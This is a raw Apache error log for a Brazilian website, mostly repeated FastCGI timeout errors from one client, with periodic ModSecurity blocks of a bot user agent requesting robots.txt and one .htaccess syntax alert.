[Sun Mar 15 17:09:01.133799 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:09:19.795602 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.228.16:60852] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcR75qj1wV0Si-OkeeJFAAAAAs"]
[Sun Mar 15 17:09:23.114798 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:09:44.137850 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:10:06.403193 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45634] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:10:29.125680 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:10:56.053842 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46292] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:11:17.130277 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:11:39.045926 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:12:00.125512 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:12:21.129783 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:12:42.129793 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:12:51.437601 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.244.31:56646] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcSwwlT9VtDQc7bgUw21QAAARM"]
[Sun Mar 15 17:13:03.133816 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47710] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:13:26.136552 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:13:48.121785 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:14:09.125782 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:14:21.788114 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.228.16:60632] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcTHbABkC4fWIHEf8GQ1QAAAEY"]
[Sun Mar 15 17:14:30.125886 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48770] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:14:51.118902 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:15:12.105835 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:15:33.129805 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:15:54.137802 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:16:15.073589 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:16:36.119226 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:16:57.021886 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:17:18.133789 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:17:39.100767 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:18:00.129560 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51082] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:18:00.533300 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.244.31:47560] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcT-LABkC4fWIHEf8GRMgAAAEE"]
[Sun Mar 15 17:18:21.021806 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:18:43.126781 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51502] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:19:05.129816 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:19:26.081948 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:19:43.058853 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.228.16:42502] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcUX9SswJuvopo3lOgLmAAAAI4"]
[Sun Mar 15 17:19:47.105053 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:20:09.134014 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52190] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:20:30.137798 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52384] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:20:52.091845 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52696] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:21:13.142163 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:21:34.129777 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53102] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:21:55.125777 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53264] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:22:16.061818 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:22:37.033815 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53704] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:22:58.317779 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53878] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:23:20.122387 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:23:24.117769 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.244.31:38654] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcVPHbQATo66fKoS7zvPgAAAMk"]
[Sun Mar 15 17:23:43.069975 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:24:13.445883 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54564] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:24:35.123623 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54732] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:24:56.137072 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54880] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:25:18.138286 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:25:40.045853 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55288] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:26:02.045910 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:26:23.985822 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55708] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:26:45.049840 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:27:06.025845 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:27:27.123355 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:27:48.125788 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:28:09.121244 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56716] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:28:30.105588 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:28:51.049844 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:29:12.122174 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:29:35.128075 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57290] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:29:56.129795 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57558] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:30:18.126812 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:30:40.037848 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:31:02.125882 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:31:24.133800 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:31:45.133870 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:32:08.129888 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:32:30.133802 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:32:51.094853 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58878] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:33:12.125789 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:33:34.110671 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:33:51.078542 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.244.31:59882] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcXr3bQATo66fKoS7zwKgAAAMg"]
[Sun Mar 15 17:33:55.117916 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:34:12.725268 2026] [core:alert] [pid 21805:tid 140411607643904] [client 66.249.74.169:38228] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Sun Mar 15 17:34:16.126793 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:34:38.033808 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:35:00.135692 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:35:08.024584 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.228.16:34928] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcX_AlT9VtDQc7bgUw57QAAARg"]
[Sun Mar 15 17:35:22.099987 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:35:43.121893 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:36:06.133831 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60512] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:36:27.125875 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:36:48.129804 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:37:10.137781 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32828] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:37:32.137329 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:37:54.121794 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:38:21.045899 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:38:47.120957 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34052] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:38:55.645349 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.244.31:44118] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcY37ABkC4fWIHEf8GTLgAAAEY"]
[Sun Mar 15 17:39:08.125851 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34288] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:39:31.764924 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:39:53.141824 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:40:14.134770 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:40:25.478126 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.228.16:36106] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcZObABkC4fWIHEf8GTcQAAAEM"]
[Sun Mar 15 17:40:40.121778 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:41:01.105839 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:41:23.125801 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:41:44.137181 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:42:05.135870 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:42:27.121200 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:42:48.133622 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:43:09.123624 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:43:31.137789 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:43:52.126096 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38024] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:44:12.130099 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.244.31:41304] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcaHHjZBu2q05ozVU_8sAAAAVY"]
[Sun Mar 15 17:44:13.033811 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:44:34.121824 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:44:56.045884 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38870] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:45:17.137781 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:45:28.768706 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.228.16:43280] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcaaAlT9VtDQc7bgUw70gAAAQo"]
[Sun Mar 15 17:45:38.121908 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39452] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:46:02.114314 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:46:23.053923 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:46:44.133786 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40212] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:47:06.128770 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:47:28.117792 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:47:49.558878 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:48:12.129799 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:48:33.126510 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:48:55.133360 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41738] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:49:16.082193 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42012] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:49:17.289004 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.244.31:55652] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcbTZqj1wV0Si-OkeeNbQAAAAM"]
[Sun Mar 15 17:49:37.138258 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:50:00.154312 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:50:21.130172 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42814] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:50:42.129798 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43060] AH01075: Error dispatching request to : (polling)
